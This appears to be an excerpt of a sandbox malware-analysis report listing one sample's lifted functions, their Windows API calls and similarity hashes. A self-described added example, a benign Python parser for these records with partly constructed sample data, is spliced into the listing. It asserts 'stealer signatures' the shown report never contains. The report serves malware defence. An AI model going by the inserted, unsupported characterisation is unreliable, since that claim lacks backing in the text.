                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: recv
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1507349165-0
                                                                                                                                                                        • Opcode ID: e1052a574a44210ed985d85ac1c46d1ff5235fea58484dea75272b1fa8954b41
                                                                                                                                                                        • Instruction ID: 4983c7f9da2fc6ac2c5c9174da6ec2c35ae911926e7d3fc7241c3079bda33f4b
                                                                                                                                                                        • Opcode Fuzzy Hash: e1052a574a44210ed985d85ac1c46d1ff5235fea58484dea75272b1fa8954b41
                                                                                                                                                                        • Instruction Fuzzy Hash: DDD05E30304601A7E729DB0DCC20F277AD2EBC4780F10403CB145862E2D6A0EC51C689
APIs
• Process32Next.KERNEL32(?,?), ref: 004322EE
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: NextProcess32
• String ID:
• API String ID: 1850201408-0
• Opcode ID: f1a7e04dffbaed30dbeea662e4c1f3855788187fec44ff9b4e6bd0a04cad32ab
• Instruction ID: b386908dd5407730fbed8e13b816bbe60387e8482b7c81fb8bd3be2812ac8047
• Opcode Fuzzy Hash: f1a7e04dffbaed30dbeea662e4c1f3855788187fec44ff9b4e6bd0a04cad32ab
• Instruction Fuzzy Hash: B9D05E702192539FE708DF68CC69D2533E1FB08205B04447CF452C7261FB30E801DB01
APIs
• FindNextFileA.KERNELBASE(?,?), ref: 00439A2D
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: FileFindNext
• String ID:
• API String ID: 2029273394-0
• Opcode ID: 9ab9f7ccb272539f927e15ffd3bcac00d97b8e44c3a332959080f7242ed091ac
• Instruction ID: 7b65b1224dafe667902ccfee81bf971f8f4eec0931a7b407e6769250000b8759
• Opcode Fuzzy Hash: 9ab9f7ccb272539f927e15ffd3bcac00d97b8e44c3a332959080f7242ed091ac
• Instruction Fuzzy Hash: A4D017707021089FEF98CF18D9A1F6A33F2AB98300F10416CEA06C72A0EAB4AC418F14
APIs
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: NextProcess32
• String ID:
• API String ID: 1850201408-0
• Opcode ID: 03d5a62a8865a22e922ee24f28ec4e514bd182ba475d9ee30d3a8d5439378a25
• Instruction ID: a6e8a5867875d86b053a5a100444789fb2eba92d4a2d50b67504112a7ddd4b7a
• Opcode Fuzzy Hash: 03d5a62a8865a22e922ee24f28ec4e514bd182ba475d9ee30d3a8d5439378a25
• Instruction Fuzzy Hash: BED0C936301552DFD308AB18DC69A3937E6EF49251B124029E816DBAD0EB61DC038B05
APIs
• CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0043391F
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: CreateGlobalStream
• String ID:
• API String ID: 2244384528-0
• Opcode ID: 7db6cecca822eafc5e761e19389be8e5f0a01556ce790b51e505aaeacc1aeba8
• Instruction ID: 36c0bedffeb522967653a2c643f8bd60dfd6de0e6368a69daa1c5b12d29803ff
• Opcode Fuzzy Hash: 7db6cecca822eafc5e761e19389be8e5f0a01556ce790b51e505aaeacc1aeba8
• Instruction Fuzzy Hash: 4AD05231304018AFFB08CB18C889F6973A0AB00B02F001129FB05EB2D1E6A0AC008B19
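The function records above follow one fixed layout: an APIs block with the resolved import and its call-site address (here Process32Next, FindNextFileA and CreateStreamOnHGlobal in process 15), the memory dump the function was lifted from, and a Similarity block whose Opcode ID and Instruction ID are stable identifiers for pivoting between reports. As an added example, not part of the Joe Sandbox report and not Joe Sandbox code, the following Python parser turns these records into structured objects, indexes call sites by API name, strips the "Download File" link residue from the Associated lines, and intersects Instruction IDs with a second report to find reused code. The sample text is copied (abbreviated) from the records above; OTHER_REPORT, its addresses and its zero/one-filled identifiers are constructed for the demonstration.

```python
import re
from dataclasses import dataclass, field

# Matches an APIs entry such as "• Process32Next.KERNEL32(?,?), ref: 004322EE"
API_RE = re.compile(r"^• (?P<func>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
# Matches any other bullet, e.g. "• Instruction ID: 7b65b1..." or "• String ID:"
KV_RE = re.compile(r"^• (?P<key>[^:]+):\s*(?P<val>.*)$")

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)        # (function, module, args, ref address)
    fields: dict = field(default_factory=dict)      # Source File, Snapshot File, Similarity keys
    associated: list = field(default_factory=list)  # Associated memory dump names

def parse_records(text):
    """Split a Joe Sandbox function listing into records; each record starts at an 'APIs' line."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()                          # the report is heavily indented
        if line == "APIs":
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None or not line.startswith("•"):
            continue                                # section headers such as "Similarity"
        m = API_RE.match(line)
        if m:
            current.apis.append((m["func"], m["module"], m["args"], m["ref"]))
            continue
        m = KV_RE.match(line)
        if m and m["key"] == "Associated":          # drop the page's "Download File" link text
            current.associated.append(m["val"].removesuffix("Download File").strip())
        elif m:
            current.fields[m["key"]] = m["val"].strip()
    return records

def index_by_api(records):
    """Map each resolved API name to the call-site addresses that reference it."""
    idx = {}
    for r in records:
        for func, _module, _args, ref in r.apis:
            idx.setdefault(func, []).append(ref)
    return idx

def instruction_ids(records):
    return {r.fields["Instruction ID"] for r in records if "Instruction ID" in r.fields}

def shared_instruction_ids(records_a, records_b):
    """Instruction IDs present in both listings: the same lifted function in two samples."""
    return instruction_ids(records_a) & instruction_ids(records_b)

# Abbreviated copy of the four records above (first record keeps one Associated line).
SAMPLE_REPORT = """
APIs
• Process32Next.KERNEL32(?,?), ref: 004322EE
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Similarity
• API ID: NextProcess32
• String ID:
• Opcode ID: f1a7e04dffbaed30dbeea662e4c1f3855788187fec44ff9b4e6bd0a04cad32ab
• Instruction ID: b386908dd5407730fbed8e13b816bbe60387e8482b7c81fb8bd3be2812ac8047
APIs
• FindNextFileA.KERNELBASE(?,?), ref: 00439A2D
Similarity
• API ID: FileFindNext
• Opcode ID: 9ab9f7ccb272539f927e15ffd3bcac00d97b8e44c3a332959080f7242ed091ac
• Instruction ID: 7b65b1224dafe667902ccfee81bf971f8f4eec0931a7b407e6769250000b8759
APIs
Similarity
• API ID: NextProcess32
• Instruction ID: a6e8a5867875d86b053a5a100444789fb2eba92d4a2d50b67504112a7ddd4b7a
APIs
• CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0043391F
Similarity
• API ID: CreateGlobalStream
• Instruction ID: 36c0bedffeb522967653a2c643f8bd60dfd6de0e6368a69daa1c5b12d29803ff
"""

# Constructed second listing (hypothetical sample): shares the FindNextFileA Instruction ID.
OTHER_REPORT = """
APIs
• FindNextFileA.KERNELBASE(?,?), ref: 00412A10
Similarity
• Instruction ID: 7b65b1224dafe667902ccfee81bf971f8f4eec0931a7b407e6769250000b8759
APIs
• Sleep.KERNEL32(00000BB8), ref: 00412B40
Similarity
• Instruction ID: 1111111111111111111111111111111111111111111111111111111111111111
"""

if __name__ == "__main__":
    recs = parse_records(SAMPLE_REPORT)
    print(index_by_api(recs))
    print(shared_instruction_ids(recs, parse_records(OTHER_REPORT)))
```

Grouping by API is what makes the listing actionable: Process32Next alongside FindNextFileA and CreateStreamOnHGlobal in one module is the process-enumeration, file-harvesting and in-memory stream pattern the report's stealer signatures describe, and the Instruction ID intersection lets an analyst confirm that a new sample reuses the same lifted function rather than merely importing the same API.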
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: NextProcess32
• String ID:
• API String ID: 1850201408-0
• Opcode ID: 52cb4b924477ad297b9d310a7b79312e9367900fe270d42d3f16c689824009af
• Instruction ID: 91410154d8b1c219705c3ccea44c82065f4db187a1e621bdf11afb1888c18072
• Opcode Fuzzy Hash: 52cb4b924477ad297b9d310a7b79312e9367900fe270d42d3f16c689824009af
• Instruction Fuzzy Hash: F3D012B53019019F8B2C8B15EC6DE6E33A8FF46210B05406DF8078B6F0DE605852CE89
APIs
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: NextProcess32
• String ID:
• API String ID: 1850201408-0
• Opcode ID: 1e5c3e7a63e0c86559881461c126636028b4a77ddaf62310fd858a4392e47ecb
• Instruction ID: ebde0ec059129b2a44436a79e91c780e06681a571f05695f4905cd54bded5e38
• Opcode Fuzzy Hash: 1e5c3e7a63e0c86559881461c126636028b4a77ddaf62310fd858a4392e47ecb
• Instruction Fuzzy Hash: BED012352408028F8300AF6DEC98E2A33ECAF4920031280A8F801C72A2DA20EC208A1A
APIs
• TerminateProcess.KERNEL32(?,00000000), ref: 00434AC3
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: ProcessTerminate
• String ID:
• API String ID: 560597551-0
• Opcode ID: a1d6840de33cba9a2cf33eee3e17990fba529f43d3e8edd4098ffbca4f2a1a1c
• Instruction ID: 9c405027916fdae13b027183f18ec21c118ada088c9347a0a4b4f3e9f9f131ad
• Opcode Fuzzy Hash: a1d6840de33cba9a2cf33eee3e17990fba529f43d3e8edd4098ffbca4f2a1a1c
• Instruction Fuzzy Hash: BDC08C32100C009FC3159B60DD8CBAA3378FB88700F000002F24A8F0F0C3A42403DF0A
APIs
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 51fa24fc811e2ae57d14ec64acf3f7df75b46b42d95a20282ed8d6bd5c31a70e
• Instruction ID: a0fb99e7e1a8e354e03aa523d267beb74399a57a338aebf0b4d66e42b4dfb09f
• Opcode Fuzzy Hash: 51fa24fc811e2ae57d14ec64acf3f7df75b46b42d95a20282ed8d6bd5c31a70e
• Instruction Fuzzy Hash: E4017536A00204CFCB01DFBCDC419D9B7B4FF9E314B088251E915E7221E7709A95CB85
APIs
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 0041CEDF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocLocal
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3494564517-0
                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00433477
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocLocal
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3494564517-0
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcmpi
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1586166983-0
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Sleep
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3472027048-0
                                                                                                                                                                        • Opcode ID: 19ac461e9816622c4a4271341707a37060ee481cd88e1103d668710ed04c7f30
                                                                                                                                                                        • Instruction ID: 4c0722d13ccb888171deee9a4bfb133b8c74b6dc22ead532a3c802c332daa8fc
                                                                                                                                                                        • Opcode Fuzzy Hash: 19ac461e9816622c4a4271341707a37060ee481cd88e1103d668710ed04c7f30
                                                                                                                                                                        • Instruction Fuzzy Hash: 3DD05E39340118AFD314CF54EBD4C143366FF98B0032441A8D906073EBEE702C40CA2A
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 0042159B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
